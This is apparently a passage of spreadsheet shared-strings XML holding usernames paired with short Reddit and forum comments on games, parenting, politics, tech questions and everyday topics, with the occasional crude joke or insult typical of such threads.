  </si>
  <si>
    <t>I've heard it posited that this was foreshadowing of the Theilaxu experimenting with adding different Duncan parts together to see if he could remember his other lives, but I'm more inclined to believe that it was a flub on Herbert's part.</t>
  </si>
  <si>
    <t>DealingDrugs</t>
  </si>
  <si>
    <t>I’m super excited to see the upgrades at BJ when all is said and done. Wish it happened when I was still playing hardball, but better late than never!</t>
  </si>
  <si>
    <t>Gott_ist_tot</t>
  </si>
  <si>
    <t>&gt; What, ypur the odd ball 50pds bro Wut?</t>
  </si>
  <si>
    <t>Happyberger</t>
  </si>
  <si>
    <t>That's why you just go to Church on Edgewood, best of both worlds!</t>
  </si>
  <si>
    <t>CalicoJackosaur69</t>
  </si>
  <si>
    <t>Jurassic Park related, but here is some fan art I made for the fictional TV series "Primal," coming to adult swim this year in the fall! Enjoy!</t>
  </si>
  <si>
    <t>renegadecoaster</t>
  </si>
  <si>
    <t>"reporting to work immediately" gives me a funny mental picture that he was standing right in front of the doors to the team facility and burst in just after agreeing</t>
  </si>
  <si>
    <t>TheReverend403</t>
  </si>
  <si>
    <t>Is that your euphemism for "fart"?</t>
  </si>
  <si>
    <t>vivekkhera</t>
  </si>
  <si>
    <t>I’m not calling for that. I just suspect he might get fired.</t>
  </si>
  <si>
    <t>OnlyJones</t>
  </si>
  <si>
    <t>Oh. So after all this you *are* actually gay.</t>
  </si>
  <si>
    <t>chilli604</t>
  </si>
  <si>
    <t>Inno wrote: ↑ Jul 23rd, 2019 6:20 am It's not on their site now. Was the sale posted here on RFD? I think it was posted. This was about a year ago though.</t>
  </si>
  <si>
    <t>beantime101</t>
  </si>
  <si>
    <t>Precisely, I am down on my votes, due too Karen's. They are a disease, we must stick together and fend ourselves</t>
  </si>
  <si>
    <t>cash_dollar_money</t>
  </si>
  <si>
    <t>Yeah that's a thing too. Racism being real and people being assholes and blaming it on racism are in no way mutually exclusive.</t>
  </si>
  <si>
    <t>Blustof</t>
  </si>
  <si>
    <t>Oh there is turning back. Been done before.</t>
  </si>
  <si>
    <t>BummedTiger</t>
  </si>
  <si>
    <t>Such a great game! Its little overwhelming how big the world is, but once you get into it it's a lot of fun.</t>
  </si>
  <si>
    <t>dandanmichaelis</t>
  </si>
  <si>
    <t>I spent the first 8 months of my daughters life jealous of literally every other baby. My daughter was SO fussy and cried constantly and never was chill. Anytime I saw a baby just chillin in taget in their car seat I would feel this black pit in my stomach. She’s 2.5 now and I’ve not felt that way in a LONG time! I think you just accept your normal and learn to love it.</t>
  </si>
  <si>
    <t>BlinkysaurusRex</t>
  </si>
  <si>
    <t>Did they though, or is it just the British being the chosen faction for those battles? Because besides Rotterdam, nothing is being replaced. The British did fight in Norway, did fight through the Fall of France, did fight in North Africa and did fight in the Mediterranean. So, "replace *all* the other people who fought in WW2... with Brits?" is quite a reach. And it's a sensible decision considering the British fought across the most geographical areas, for the longest, and for a period, stood alone against Germany. The fact that we don't have the Dutch fighting in Rotterdam is just utter laziness on Dice's part, and Hannut as well, I just remembered. But the rest is fine.</t>
  </si>
  <si>
    <t>As a general rule the older the vehicle the more maintenance and servicing is required. Plus, the 1969 Mustang was not known for its stellar reliability and its overall quality was only average at best.</t>
  </si>
  <si>
    <t>keetojm</t>
  </si>
  <si>
    <t>I think you mean 3.</t>
  </si>
  <si>
    <t>phoenix4ce</t>
  </si>
  <si>
    <t>Sort of. It's [future Tony.](https://marvel.fandom.com/wiki/Anthony_Stark_\(Earth-TRN591\))</t>
  </si>
  <si>
    <t>master_chilln</t>
  </si>
  <si>
    <t>I did. But he only paralyzed him. Joker actually went straight up broke his own neck.</t>
  </si>
  <si>
    <t>Hemphlev</t>
  </si>
  <si>
    <t>Yeah, I can’t wait to gun down folks running melee builds. Easy wins in crucible</t>
  </si>
  <si>
    <t>MakeVio</t>
  </si>
  <si>
    <t>Hello everyone. I will start off by saying I am somewhat new to programming especially in Java. I have used intellij from day one and just love it so much. However my job recommends eclipse, and Mars 2 specifically. I am not sure if this is because the 2 ide s have vast differences , or if maybe my work just doesn't want to put themselves in a position to be asked to pay for an intellij license. So my question really is, does any one know the key differences ? A simple Google search has revealed to me what is different or rather what to expect with eclipse in general. However I can't find much data specifically pertaining to Mars 2 comparison to intellij. Is there anything major like the way Mars will write to files or something? Thank you very much.</t>
  </si>
  <si>
    <t>lozo828</t>
  </si>
  <si>
    <t>Kittenstation.com Hi, if anyone could spare the time to critique my website it would be greatly appreciated. My conversion rate is not good. Thanks a lot</t>
  </si>
  <si>
    <t>CampGareth</t>
  </si>
  <si>
    <t>ShakriShikri 26/07/2019 10:26 Can I power the mac book pro 2014 with usb-c? so need of mag-safe2? Check amazon, there are loads of Chinese adapter cables. You won't find any western name brands making them though as apple would sue, they do not allow third parties to use magsafe 2.</t>
  </si>
  <si>
    <t>highpost1388</t>
  </si>
  <si>
    <t>Where can I find the major differences between normal and hard mode? I'm a first time FE player, so it's an interesting decision. I don't want to be bored, but I don't want to just increase enemy hp and reduce my accuracy, which only serves to draw out battles. I'm just not sure on this one. Leaning towards normal to get used to the systems, but I'm interested in different perspectives.</t>
  </si>
  <si>
    <t>Nemester</t>
  </si>
  <si>
    <t>Wikipedia Editors Attempt To Delete Sci-Fi Author Pages They Deem Right-Wing</t>
  </si>
  <si>
    <t>ToddVRsofa</t>
  </si>
  <si>
    <t>You learn what the definition actually is before you try anything</t>
  </si>
  <si>
    <t>nswinton</t>
  </si>
  <si>
    <t>They call that prodromal labor and it is soooo exhausting both physically and mentally. I've had it with all 3 of my kids for 2, 3 and 5.5 weeks respectively and it's just brutal. But it does mean the end is near. Just hang in there and try to rest as best you can.</t>
  </si>
  <si>
    <t>SHA_1944</t>
  </si>
  <si>
    <t>&gt;The Late Philip J Fry. That *In the Year 2525* parody song/video is both funny, sad and makes you think at the same time. Clearly my favorite episode of all time.</t>
  </si>
  <si>
    <t>coffeemilkstout</t>
  </si>
  <si>
    <t>a Chuck Tingle novel</t>
  </si>
  <si>
    <t>freebirdls</t>
  </si>
  <si>
    <t>They had us in the first half, not gonna lie</t>
  </si>
  <si>
    <t>jerick70</t>
  </si>
  <si>
    <t>So how does this MKII compare to the MKI? I have a MKI right now and love it. Any advantages to upgrading to MKII?</t>
  </si>
  <si>
    <t>iHavoc93</t>
  </si>
  <si>
    <t>I would go half a size, recently bought a pair TTS and I regret not sizing down by half.</t>
  </si>
  <si>
    <t>NeptunianZero</t>
  </si>
  <si>
    <t>This is very cool!</t>
  </si>
  <si>
    <t>Liamg (invalid@example.com)</t>
  </si>
  <si>
    <t>Top Theme designed by ThemeHouse . This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register. By continuing to use this site, you are consenting to our use of cookies.</t>
  </si>
  <si>
    <t>Jacqsie</t>
  </si>
  <si>
    <t>In reply to clairenatasha 23/07/19 Can I ask why you'd refuse the test? (FTM so interested to know) I’m not sure this poster’s reasoning but I refused because it’s a very poor test. This bacteria can test positive at 36wks then negative at the time of birth &amp; then you are exposed to antibiotics unnecessarily. On the other hand it can test negative &amp; you have the bacteria by the time you give birth. A lot of countries don’t test for this reason. For my last birth I elected to not test &amp; receive antibiotics regardless if my waters were broken for a prolonged period.</t>
  </si>
  <si>
    <t>iwantsurprises</t>
  </si>
  <si>
    <t>You're going to have to start complaining to the landlord and the police EVERY time it happens and keep a record of it as well. You are building documentation of an ongoing issue. Get a log book and write down the date and time and that you made complaints each time. Then after a couple weeks put it into writing and send a certified mail copy to your landlord so you can demonstrate that it was received. Use the phrase "quiet enjoyment" and include a copy of the logs of how often it has happened. It doesn't have to be at night to be a violation of local noise statutes, and your LL also is obligated to make sure you have quiet enjoyment of your rented home. That means basically the right to use your home without unreasonable disturbances like this one. Because it's your right, if your LL doesn't fix the issue, you would be entitled to take actions such as breaking your lease or seeking damages. (Obv you don't want to go that far and would consult a lawyer before trying) The way to get landlords to take a problem like this seriously is to make it their problem, by calling every time it happens (yep even at night), as well as framing it as their problem by talking about not having quiet enjoyment of your unit.</t>
  </si>
  <si>
    <t>skittlebug</t>
  </si>
  <si>
    <t>I do knitting and crochet commissions :)</t>
  </si>
  <si>
    <t>Angel-likeDevil</t>
  </si>
  <si>
    <t>I guess like Deja said about Ruk ruk being one that is frequently brought up in Anthakshari, this was one such song too.. it was played everywhere, I never feel like listening to it https://www.youtube.com/watch?v=PgZJUPR_xPg</t>
  </si>
  <si>
    <t>TheFox30</t>
  </si>
  <si>
    <t>That is such a horrible death</t>
  </si>
  <si>
    <t>Oliver2112</t>
  </si>
  <si>
    <t>I took me like 3 minutes of analyzing this and I finally got it lmao</t>
  </si>
  <si>
    <t>Blackcatlivesmatter9</t>
  </si>
  <si>
    <t>Only 2 hours! You are both very lucky!!! He is gorgeous!</t>
  </si>
  <si>
    <t>Hi there! Your post was removed because it uses the text box. AskReddit does not allow use of the text box, aside from a period. Per [rule 1](/r/AskReddit/wiki/index#wiki_-rule_1-), use of the text box is prohibited. [**When you've removed everything from the textbox, message the mods for review and reapproval.**]() and ask the moderators to re-approve it. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskReddit) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>MechanicalEngineEar</t>
  </si>
  <si>
    <t>this absolutely depends on the recycling center. my trash company specifically says things like pizza boxes are recyclable. The same is true with various plastics and other recyclable materials. it heavily depends on the equipment and capabilities the recycling center has</t>
  </si>
  <si>
    <t>collectiveindividual</t>
  </si>
  <si>
    <t>Speaking from one of those third world countries as defined in the article, the USA certainly lost a lot of respect when it lost interest in Iraq. Then it became obvious that Iraq was more about a knee jerk reaction to the shock of 9/11 than any real security concern like with Afghanistan. Bush could be forgiven for his "with us or against us" rally cry in the aftermath of 9/11, but after losing interest in Iraq with his "job done" attitude, it actually alienated a lot of friendly nations who were left dealing with the refugee crisis from the festering wars that filled the vacuum after the USA public lost interest. The USA public erased the failure and were more interested in Youtube clips of parents surprising their kids and pets on their return from duty. The biggest problem with the Iraq war is it showed that the USA could win any conventional battle but it could not win asymmetrical warfare, just as Britain could not turn back independence movements in its empire. If the USA self belief is based on its military supremacy, then getting bogged down in nation building in Iraq simply was more than the national attention span could sustain. For a lot of nations, including my own, Trump is very much seen as an insular USA president, with zero consistency in foreign policy. So in practice a lot of nations are sitting out his presidency, and his reelection if needs be. The USA is still powerful and important, but with a meglomanic in charge it's effectively not a reliable business partner, especially after pulling out of the TPP. This doesn't mean allies are turning their backs on the USA, it just means they're continuing on in global developments that Trump has absented the USA from.</t>
  </si>
  <si>
    <t>michelenedawn</t>
  </si>
  <si>
    <t>Ex-hole</t>
  </si>
  <si>
    <t>This is the best tl;dr I could make, [original](https://www.theguardian.com/environment/2019/jul/26/eib-plans-to-cut-all-funding-for-fossil-fuel-projects-by-2020) reduced by 77%. (I'm a bot) ***** &gt; In the past the EIB has funded fossil fuel projects including the Trans Adriatic gas pipeline and oil storage facilities in Cyprus. &gt; The crackdown on fossil fuel lending comes amid growing pressure on financial institutions to cut their exposure to high-carbon projects. &gt; "While the EU and national governments are floundering as the planet burns, the EU's public bank has made the brave, correct and just proposal to stop funding fossil fuel projects. We are now urging the European Investment Bank's board to endorse this step forward, and ensure there are no loopholes for fossil fuel funding." ***** [**Extended Summary**](http://np.reddit.com/r/autotldr/comments/ci68mj/eib_plans_to_cut_all_funding_for_fossil_fuel/) | [FAQ](http://np.reddit.com/r/autotldr/comments/31b9fm/faq_autotldr_bot/ "Version 2.02, ~415595 tl;drs so far.") | [Feedback](http://np.reddit.com/message/compose?to=%23autotldr "PM's and comments are monitored, constructive feedback is welcome.") | *Top* *keywords*: **fossil**^#1 **fuel**^#2 **projects**^#3 **EIB**^#4 **Bank**^#5</t>
  </si>
  <si>
    <t>TrollFacev2</t>
  </si>
  <si>
    <t>game to do with your homies: play Wii sports resort fencing but put the Wii remotes in your ass and see who wins</t>
  </si>
  <si>
    <t>Sahe1337</t>
  </si>
  <si>
    <t>Only one way to change that.</t>
  </si>
  <si>
    <t>Russendis-co</t>
  </si>
  <si>
    <t>It's like nobody reading my comment. Did I wrote something about cut heroin? No. I wrote about cut other drugs which are the opposite of fentanyl. I mean if you want LSD it's not a nice trip to get fentanyl even if you survive.</t>
  </si>
  <si>
    <t>KingHatch</t>
  </si>
  <si>
    <t>Yeah someone last season had no confessionals for 6 episodes and barely any airtime then spiked and had the most confessionals of the season.</t>
  </si>
  <si>
    <t>SloppyFrenchKisser</t>
  </si>
  <si>
    <t>OmarSparks</t>
  </si>
  <si>
    <t>A few months ago, I accidentally spilled ginger ale on my MK3. I waited a few days to dry up. I opened it up and cleaned underneath the pads including the pad sensors with some electronic alcohol cleaner. Everything still works accept the pad on the bottom right corner of the Mashine. The pad still lights when it’s turned but you have to press harder on it. The sensor pad is still a little sticky. I went on Mpcsales.com and I noticed that they sell pad sensor sheets for the Maschine MK1/MK2 but it doesn’t say if its good for the MK3. Should I buy one to see if it would work? Should I get a new MK3 or should I keep the MK3? I feel odd of using it because of one pad not working all the way plus I don’t have warranty on it. I need some answers.</t>
  </si>
  <si>
    <t>redname325</t>
  </si>
  <si>
    <t>I really need to try authentic pizza in Italy.</t>
  </si>
  <si>
    <t>Severium</t>
  </si>
  <si>
    <t>To that hentai?</t>
  </si>
  <si>
    <t>MickeyAscended</t>
  </si>
  <si>
    <t>And you will never! But it's a great game, I have too much fun with it</t>
  </si>
  <si>
    <t>T12R7</t>
  </si>
  <si>
    <t>benjyfishy and MrSavage for duos, and Tfue in solos.</t>
  </si>
  <si>
    <t>MrFlibblesEyes</t>
  </si>
  <si>
    <t>Why does he want to try before you are married? Is he worried that he will marry you and then you will turn around and say that you don't want children at all?</t>
  </si>
  <si>
    <t>prashants985</t>
  </si>
  <si>
    <t>even after removing that I get the same run time error</t>
  </si>
  <si>
    <t>xmltrek</t>
  </si>
  <si>
    <t>Can you blame him? I hear the profit on selling nuclear bomb technology is quite high.</t>
  </si>
  <si>
    <t>Thethcelf</t>
  </si>
  <si>
    <t>Maybe I’m trippin but did anyone else not hear the gunshot?</t>
  </si>
  <si>
    <t>Psychic_Pancake</t>
  </si>
  <si>
    <t>There are a few out there but a lot of them are on sites that have been taken down. I’ve forgotten the site I got mine from, but if you’re desperate I can send you the file.</t>
  </si>
  <si>
    <t>northrivergeek</t>
  </si>
  <si>
    <t>just use dzsa launcher [https://dayzsalauncher.com](https://dayzsalauncher.com/#/home) and tick the first person box, sort by player count , then try them out .. only u can decide what you like best.</t>
  </si>
  <si>
    <t>secretidahoan</t>
  </si>
  <si>
    <t>Senna at the Sun Valley Road Rally 2019 (Idaho)</t>
  </si>
  <si>
    <t>Groovers</t>
  </si>
  <si>
    <t>wow, thank you for this post sharing</t>
  </si>
  <si>
    <t>DuFFman_</t>
  </si>
  <si>
    <t>Maybe you could start by telling us what it is you wish the pixel did have. As I'm sure someone will be able to explain why it doesn't. Though it's not always an answer you want to hear.</t>
  </si>
  <si>
    <t>way2manycats</t>
  </si>
  <si>
    <t>This is probably the one time having womens pants is an advantage. No pockets to store the phone bomb.</t>
  </si>
  <si>
    <t>CholeOle</t>
  </si>
  <si>
    <t>Rice. It should be so easy.</t>
  </si>
  <si>
    <t>PX Eliezer</t>
  </si>
  <si>
    <t>I agree with you that assistive technology can lull drivers into false confidence. OTOH a rearview backup camera still involves the driver's eyes and steering, it just adds another view to that of the mirror.</t>
  </si>
  <si>
    <t>SupportFace</t>
  </si>
  <si>
    <t>I was bored so I asked my brother if he had any games I could play, of course he recommends crusader kings and I end up agreeing. He teaches me some of the basics (basics took 3 hours) and then I was off on my own and sense I’m a Jojo fan I decided to make the Joestar dynasty. Everything thing was going along fine I was winning wars joining Lucifer’s cult and I had like 6 kids the first born was Jolyne Joestar, my second was Jotaro Joestar, my third Joseph Joestar, my fourth Josuke Joestar, my Fith Jonathan( named after me because I had just got cancer) and his twin holly Joestar because I ran out of jojo names. Everything was going along smoothly till Holly my youngest started acting weird, the animals didn’t like her she laughed when the butcher accidentally cut his hand and she made strange buzzing noises at the other children. The game told me she had a fifty percent chance of being possessed and as her loving Lucifer cult worshiping dad I couldn’t have been happier. When the time finally came my first character Jonathan Joestar had died, and Jolyne took over everything was going fine until she woke up one night to find Holly stabbing her in the eye and she died from her wounds. I thought “welp that’s unfortunate but I guess I get more land with Jotaro (because my land had been split in between him and Jolyne)” so I started playing as him but within a week again Holy stabbed me in the eye but Jotaro only became crippled and at that point I decided I was going to imprison her but I guess my court liked the demon possessed child because they wouldn’t allow me to arrest her. So I thought maybe when I turn 16 they wil have to listen to me so the race was on, Holy was slowly murdering all the children and I was just trying not to die and one by one the other children started dying until I turned 16 and Holy was my only sibling. I went to go arrest her happy to finally end this epidemic but she still couldn’t be arrested so I did what any wise man or woman would do. I killed myself and then Holy became the ruler, not only did she murder her way to the top her stats were unbelievable all above thirty and her traits besides being possessed of course were great. So to sum it up pretty neat game 10/10 would play again.</t>
  </si>
  <si>
    <t>TheGuyWithTheBalloon</t>
  </si>
  <si>
    <t>Why is poultry considered meat with regards to the simcha of the nine days, but not for the simcha of yontiff?</t>
  </si>
  <si>
    <t>UnchartedOak</t>
  </si>
  <si>
    <t>“Here Now” from the Hillsong United Live from the land album (the whole album really)</t>
  </si>
  <si>
    <t>RL</t>
  </si>
  <si>
    <t>I bought eight of these to use for yard waste disposal. Good quality for for its low price point. Very pleased with this purchase. Highly recommended.</t>
  </si>
  <si>
    <t>ssulliv20</t>
  </si>
  <si>
    <t>Who else did he take photo’s with?</t>
  </si>
  <si>
    <t>CaptainKaldwin</t>
  </si>
  <si>
    <t>Thanks!! I’m so used to racing against 472942 other students to get classes in undergrad so that’s a relief to hear lol I’ll keep trying to speak with them, thanks again!</t>
  </si>
  <si>
    <t>masternarf</t>
  </si>
  <si>
    <t>Im not sure what you mean by your question?? I supported Trump because he is different than other republicans of his time, he is more moderate, cares more about the nativity of the american culture and has undertone of a democrats from the 90s</t>
  </si>
  <si>
    <t>Skittlesandbeer</t>
  </si>
  <si>
    <t>Young person’s game, that. But if memory serves, as a youf it was definitely on the menu. Never on purpose, but between rounds it could happen and be good. Takes balance, a solidly constructed shower, and soapy products of a hippy persuasion. The whole job unravels if the suds create Stingus Bitsus. Nowadays I’d be thinking about my dicky hip, and that hair was going to be a fright for days if conditioner didn’t soon play a part. Also, rubber duckies. Not sexy.</t>
  </si>
  <si>
    <t>basscorruption</t>
  </si>
  <si>
    <t>The fuck's a liver panel? Does a physical's blood test cover that?</t>
  </si>
  <si>
    <t>blurple77</t>
  </si>
  <si>
    <t>I was basing it off Marvel because that's what I've seen for them. And seems like we just have different opinions, because I don't think anyone you mentioned in your last paragraph is definitely better than Iain. Jon and Chris maybe on par. Chadwick is a definitive no from me, and Chloe is a very middling actress who I don't think will ever get a gig better than AoS.</t>
  </si>
  <si>
    <t>mail_inspector</t>
  </si>
  <si>
    <t>Well, besides Nathan tying his political ideas into his brand, the inconsistency between patches of ink, and some inks behaving like ass and/or requiring extra care without necessarily being made clear when buying or on the bottle, not too much. I was just being a bit contrarian because of the blind "Noodler's for waterproof ink" sentiment the internet seems to have.</t>
  </si>
  <si>
    <t>cheeesychipss</t>
  </si>
  <si>
    <t>Basically you can't get out of this. Be very wary of what you sign up in the future for and write this off.</t>
  </si>
  <si>
    <t>AmalgamationOff</t>
  </si>
  <si>
    <t>You are a reactionary piece of shit https://old.reddit.com/r/ChapoTrapHouse/comments/bsauem/til_that_displacing_and_killing_an_ethnic/eolyao3/</t>
  </si>
  <si>
    <t>deathhandmachiavelli</t>
  </si>
  <si>
    <t>Give me some examples and I'll see what is going on. I can tell from the language you use though, that you are a little too scientific to understand subtle social cues. You are trying to put everything into a box: "shit tested, comfort tested, or just straight up talking" Your woman has you confused and probably has a higher social IQ. Its a good thing you reading TRP so you can get your shit together.</t>
  </si>
  <si>
    <t>lexus300</t>
  </si>
  <si>
    <t>LondonCanary said: ↑ In future When goods are imported to the UK from the EU, the tarriffs are paid by the importer and passed on to the end customer in the UK. When goods are exported to the EU from the UK, tariffs are paid by the importer and the cost passsed on to the EU customer. All customers EU and UK end up paying more (except on zero tarirff goods). Lose-lose outcome. Click to expand... We have a trade deficit, we will pay less tax so overall we benefit and of course we will not be tied to EU produced goods.</t>
  </si>
  <si>
    <t>THECapedCaper</t>
  </si>
  <si>
    <t>BuT tHaT mEaNs I hAvE tO pAy DoUbLe</t>
  </si>
  <si>
    <t>DCC_Official</t>
  </si>
  <si>
    <t>Curious on your guys opinions on the thread</t>
  </si>
  <si>
    <t>QuitaQuites</t>
  </si>
  <si>
    <t>Well, there’s no ‘solution’ here that makes anyone feel better or whole, but as the child this isn’t and shouldn’t be someone’s cross to carry and really if he’d been looking in any other day the profile might now have been found. By getting it out of himself and putting the fact that he knows onto the dad it alleviates some of what he’s holding in. It also gives some perspective to the dad about what he’s doing, if his wife doesn’t already know.</t>
  </si>
  <si>
    <t>Xreedom</t>
  </si>
  <si>
    <t>This just got delivered and...</t>
  </si>
  <si>
    <t>ghost_nx</t>
  </si>
  <si>
    <t>Try to kill everyone u see after way to complete</t>
  </si>
  <si>
    <t>stevethebandit</t>
  </si>
  <si>
    <t>The norwegian edition, kvikk lunsj (quick lunch) is the best</t>
  </si>
  <si>
    <t>kosterzoo</t>
  </si>
  <si>
    <t>This is true but also a good thing imo I'm friends with 2 of my buddies from when I was young. One I have known since I was 5 and we are business partners and catch up every week to shoot the breeze. The other is the godfather of my Son and someone I could message anytime and he'd he there for me. There's still a group of us that catch up every few months as well and I always leave with a smile but it's because they're the ones who are worth hanging around. Even more bizarrely there's a few who I didn't have much time for growing up who are great friends now. All the rest, completely different people and when I bump into them conversations are so weird because we have different paths we have taken. We outgrow people and that means we fall out of touch but I would much rather this than still be the person I was 16 years ago</t>
  </si>
  <si>
    <t>therealwillhepburn</t>
  </si>
  <si>
    <t>I am very curious how he does though. Is it easier to be a coach in the NFL than in college? Does his scheme work in the pros? The Cardinals were already terrible. How will Kyler do in the pros? It’s all interesting.</t>
  </si>
  <si>
    <t>rapistforhire1999</t>
  </si>
  <si>
    <t>I use apollo and it doesn't makes this lol</t>
  </si>
  <si>
    <t>Waluigi_Boi</t>
  </si>
  <si>
    <t>He’d nerf Pauline’s spirit fight, beat it on max difficulty to flex on everyone, then buff it again</t>
  </si>
  <si>
    <t>Because if the only reason you're listening is to try and argue, then it's probably not going to work well to smooth something over. You don't have to agree, but if he wants to know why she found it offensive, trying to argue with her kinda defeats the purpose.</t>
  </si>
  <si>
    <t>Sanne</t>
  </si>
  <si>
    <t>The first room we got was not cleaned properly and felt dirty. We then got a new room, where everything was okay. Big room and comfortable bed. The location is near the beach but outside of the main strip which makes it convenient but also nice and quiet. The room had a private patio so you can also sit outside. Stayed in July 2019</t>
  </si>
  <si>
    <t>gripnerd</t>
  </si>
  <si>
    <t>Came here to say Chronicles of Crime, but I can't suggest LA Crimes. Chronicles is awesome though.</t>
  </si>
  <si>
    <t>buglerue</t>
  </si>
  <si>
    <t>Love the flower</t>
  </si>
  <si>
    <t>Baconturtles18</t>
  </si>
  <si>
    <t>touchdown and strawberry for sure.</t>
  </si>
  <si>
    <t>Bullet0718</t>
  </si>
  <si>
    <t>You will literally cut yourself playing this</t>
  </si>
  <si>
    <t>TyHay822</t>
  </si>
  <si>
    <t>I put in between 60-80 hours a month playing live. Primarily 2/5 PLO but play hold em when waiting for a plo seat some days Of course I’m also a CPA so that number drastically drops during my busy season January-April.</t>
  </si>
  <si>
    <t>jikoplm</t>
  </si>
  <si>
    <t>Agree. Something about black shorts are just hot and stylist</t>
  </si>
  <si>
    <t>Pastaistasty</t>
  </si>
  <si>
    <t>What does he get out of talking to her? Even if your jealousy was unfounded, he could be considerate enough to give up his unimportant relationship with her to keep you happy.</t>
  </si>
  <si>
    <t>youraveragewizard</t>
  </si>
  <si>
    <t>Am I wrong for just calling these house flies painted like racecars "poo flies"?</t>
  </si>
  <si>
    <t>DoublePostedBroski</t>
  </si>
  <si>
    <t>Screw Nestle.</t>
  </si>
  <si>
    <t>PhantomChihuahua</t>
  </si>
  <si>
    <t>I like concerts, but does anyone else think live music sounds kinda shitty? Like all muffled and cacophonous. I’m talking about rock concerts, by the way.</t>
  </si>
  <si>
    <t>ToInfinityandBirds</t>
  </si>
  <si>
    <t>Hahaha. Except the little mermaid is on an island with prince eric.</t>
  </si>
  <si>
    <t>hessu__83</t>
  </si>
  <si>
    <t>you really dont get point of this post do you? it dose not matter if your guild have even 200%tax that is not what is point of this topic</t>
  </si>
  <si>
    <t>Aroidan</t>
  </si>
  <si>
    <t>I agree, sometimes the worms were more of a problem then the house you are facing :)</t>
  </si>
  <si>
    <t>JimOBeano</t>
  </si>
  <si>
    <t>Just realised that doesn't account for the 'hot swap'</t>
  </si>
  <si>
    <t>ManBroCalrissian</t>
  </si>
  <si>
    <t>Your mom's house</t>
  </si>
  <si>
    <t>Carrieisonfire</t>
  </si>
  <si>
    <t>Nice! I bought a sewing machine purely to try to make some skirts but I’ve never got around to it. Hopefully one day!</t>
  </si>
  <si>
    <t>youpviver</t>
  </si>
  <si>
    <t>Why is everyone making memes about hand sanitizer from Area 51 all of a sudden? What did I miss?</t>
  </si>
  <si>
    <t>Purpleslash2</t>
  </si>
  <si>
    <t>r/subsididn’tknowexisted</t>
  </si>
  <si>
    <t>mdram4x4</t>
  </si>
  <si>
    <t>hdmi cable Anything below the is a signature : Note: This is a customer to customer forum, I am just a customer. Employees are identified as such.</t>
  </si>
  <si>
    <t>KCalifornia19</t>
  </si>
  <si>
    <t>Man that lady might look like and idiot, but she probably had a hell of a time</t>
  </si>
  <si>
    <t>SuperGeometric</t>
  </si>
  <si>
    <t>No, it's actually a fact. Knowledge of a candidate's tax returns is not functionally crucial to the operation of an election. Crucial doesn't mean "it's something I super-duper want."</t>
  </si>
  <si>
    <t>DCGMoo</t>
  </si>
  <si>
    <t>Can't teach them about being safe too young these days...</t>
  </si>
  <si>
    <t>FrangaX</t>
  </si>
  <si>
    <t>This is the one.</t>
  </si>
  <si>
    <t>Avexus02</t>
  </si>
  <si>
    <t>name checks out</t>
  </si>
  <si>
    <t>dramashow</t>
  </si>
  <si>
    <t>Sometimes it’s *kind* of funny when Dave does it, on occasion, but Reags, Greenie, etc. are just pandering and reaching and it’s embarrassing.</t>
  </si>
  <si>
    <t>Spacegrass</t>
  </si>
  <si>
    <t>&gt;&gt;2455099 Only a month? i thought you were here before me ive been around for.. maybe 3 months ish</t>
  </si>
  <si>
    <t>uhhh_nothx</t>
  </si>
  <si>
    <t>My 4 yr old Shiba (Pandora) loves to show her smile!</t>
  </si>
  <si>
    <t>JeebusHaroldCrise</t>
  </si>
  <si>
    <t>Nah. There a lots of folks that like clowns. They are supposed to be buffoons.</t>
  </si>
  <si>
    <t>WorkKrakkin</t>
  </si>
  <si>
    <t>Oh man you're so right. I haven't had some stale gummies in a long time but I remember the last time I did. My disappointment was immeasurable when I got some organic gummies thinking they'd be awesome but they're so soft.</t>
  </si>
  <si>
    <t>2mares</t>
  </si>
  <si>
    <t>Quote: Originally Posted by PilgrimsProgress I didn't read this whole thread so forgive me if it's been mentioned. Didn't Congress essentially tie Trump's hands and say any money they gave him had to be used to replace dilapidated section of useless old fence? He's been doing that so it's an improvement. We Build the Wall is still going strong. The finished product is being donated to the US. There will be a big event in NM at the newly built section Thur - Sat this week with big name speakers appearing. I wonder if they will livestream. That should drum up more donations. When you contribute you can get a personalized paver in the wall and for larger donations a personalized panel on the top. Here is the long video from the last Wall-a-thon. The first few minutes are Steve Bannon, chairman, talking about the need for a wall. Scroll down the page and see the donation options. Buy a paver in your pet's or kid's name! Buy a large bollard plaque with your company logo! https://webuildthewall.us/ Time lapse video showing construction of the first section of wall. Exciting! https://www.youtube.com/watch?v=B7f3I0sj2Cw Yes. I swear I wonder if people still study government in school. It seems a lot of people have no idea how it works. Trump is not building the wall. The president asks for funding from congress. Congress controls the purse strings. I'm not sure if anyone on this board has worked for any governmental office or dealt with government contracts as a sub-contractor, apparently not. The process moves like molasses in winter. We have waited 2 years just for a permit to do a survey. I think I read somewhere it was estimated it could take 10 to 17 years to get the wall built if all went well.</t>
  </si>
  <si>
    <t>AvatarWanderful</t>
  </si>
  <si>
    <t>Yeah, I get that. I used 'challenging' in a good way, as I like Hickman's mission statement of "we've spent too long telling X-Men stories about X-Men stories". I didn't hate Rosenberg's run, but I absolutely get why people did. I think a big part of all the killings was that Hickman apparently gave Rosenberg no 'endpoint' to get to to set up Hickman's run so Rosenberg went wild.</t>
  </si>
  <si>
    <t>Mincer</t>
  </si>
  <si>
    <t>Welcome to the forum! Well, they are just labels. You can put pickups anywhere. If I got those pickups in that guitar, I'd leave them where they are. If anything, you can swap the neck &amp; middle to see if you like the sound. A neck Hot Rails in the bridge is a pretty great sound. What else is wrong with the wiring?</t>
  </si>
  <si>
    <t>letthedevilin</t>
  </si>
  <si>
    <t>Irrelevant. Fire doesn't choose to be hot but I'm not going to stick my fucking face in it.</t>
  </si>
  <si>
    <t>elephantdoodles</t>
  </si>
  <si>
    <t>Hello! I live in a very not-Jewish area and am looking to find more Jewish people (like myself) to chat with and such to see where it goes. I’m not opposed to talking to goyim (non-jews) either, but being with another Jewish person (romantically) is very important to me, for this reason I *do not intend to date nor marry someone who is not Jewish*. I’ve never had a whole lot of luck dating app wise (especially trying to find other Jewish people), so I figured I’d try Reddit. **Here’s some fast facts about me:** - I have a bearded dragon, there’s pictures of him in my post history, his name is Tofu - I’m vegetarian - I am disabled - Marketing major but planning to go into cosmetology when I finish my first degree this December - Hobby actor (community theatre) - USA based but open to anywhere - Extremely liberal - I go both ways</t>
  </si>
  <si>
    <t>apricotasd31</t>
  </si>
  <si>
